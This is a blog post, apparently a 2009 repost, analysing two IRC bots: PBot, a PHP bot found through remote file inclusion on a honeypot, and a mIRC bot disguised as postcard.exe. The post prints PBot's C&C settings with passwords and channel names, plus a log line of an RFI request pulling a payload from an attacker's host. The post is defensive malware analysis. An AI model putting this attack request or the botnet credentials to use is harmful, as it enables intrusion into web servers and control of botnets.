Google

Rabu, 18 Februari 2009

PBot a PHP Bot found in Honeypots RFIs

While going through a couple dozen newer RFI's, I found a suspect file that turned out to be more than the usual RFI.
I thought some of my readers would like more information on this one. The file was called pbot.txt, and was downloaded from a server in Taiwan.

This file turns out to be a decently coded PHP Bot which connects to an IRC C&C. The IRC Server is located at irc.indoirc.net - which hosts a handful of smaller botnets, but also appears to be somewhat legitimate.

The bot joins a C&C channel, in this case #AnakDompu, and waits for commands. This version of the bot allows for UDP and TCP flooding, and a connect back shell. The shell is written in perl and is commonly found in many perl bots and newbie hacker kits. Google searches for dc.pl will turn up many examples.

The bot contains the dc.pl perl script in base64 encoded text. Since webservers commonly run in datacenters with a good deal of bandwidth, the TCP and UDP flooding capabilities are more generally more successful than the those on a home machine with limited upload speed.

I couple thousand of these bots could easily compare to 30 or 40 thousand dsl/cable user bots. Lucky for us, there are only 36 bots connected at this time.

I'm sure the bot author is still wondering why his commands aren't working on my snoopbot. He hasn't kicked/banned the fake bot, and continues to issue commands that just don't work.

Normally I have to work to strip out the C&C information out of the bots. These guys made it easier on me...

"server"=>"irc.indoirc.net",
"port"=>"6667",
"pass"=>"Walau.Jelek.Tetap.Bilang.Cakep.La",
"prefix"=>"ManieZ",
"maxrand"=>8,
"chan"=>"#AnakDompu",
"chan2"=>"#AnakDompu",
"key"=>"",
"modes"=>"+iBx",
"password"=>"AnakDompu",
"trigger"=>"~",
"hostauth"=>"Orang.Cakep.Tetap.Bilang.C-a-K-e-P.Co.Cc" // * for any hostname

Most of the standard IRC IDS Signatures will work in this case.

Note: Monitoring bots should always be done with the consent of your ISP. I have permission from my ISP's to perform these monitoring activities and to run Honeypots. As they say, don't try this at home.

For those who know what their doing, and are authorized by their ISP's to do so, my honeypot log entry is provided below.

89.218.85.18 - - [01/Jan/2009:14:18:37 -0500] "GET --VULNERABILITY REDACTED--=http:// c-a-k-e-p.co.cc /adu /pbots.txt??? HTTP/1.1" 200 2324 - "-" "libwww-perl/5.805" "-"

Note, the 200 status code is a feature of my honeypot - it returns 200 for all pages, found or not. I added the spaces above to keep from accidental clicks.
I removed the vulnerable page information, because I don't think its helpful to give that level of detail.

--- Another IRC bot:

A postcard? -- Nah.. A MIRC bot.



This little jewel comes from our mailbag. It was included as a binary, no source host for infection.

The file, postcard.exe is actually a RAR compressed SFX archive. When run, a RAR script that calls
a batch file is launched. The batch file opens a mountain scene picture entitled xmas.jpg.

It also runs a copy of MIRC and places that same binary in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
It uses a likely stolen/generated MIRC license ending with 6732.

It installs itself in C:\Windows\temp\spoolsv\spoolsv.exe - which would be okay, except for that directory
isn't writable on my system as a normal user. That and the location of the run key means it will only infect
those who run with administrator rights.

MIRC Bots are scripted by those not experienced. Those that connect to public IRC servers like UnderNET prove
the authors inexperience.

This one joins the channel #romania on Undernet. I'm sure the IRCOps will be on it before too long, if they
actually have any hosts - I didn't bother to check.


Source :
http://www.disog.org/2009/01/pbot-php-bot-found-in-honeypots-rfis.html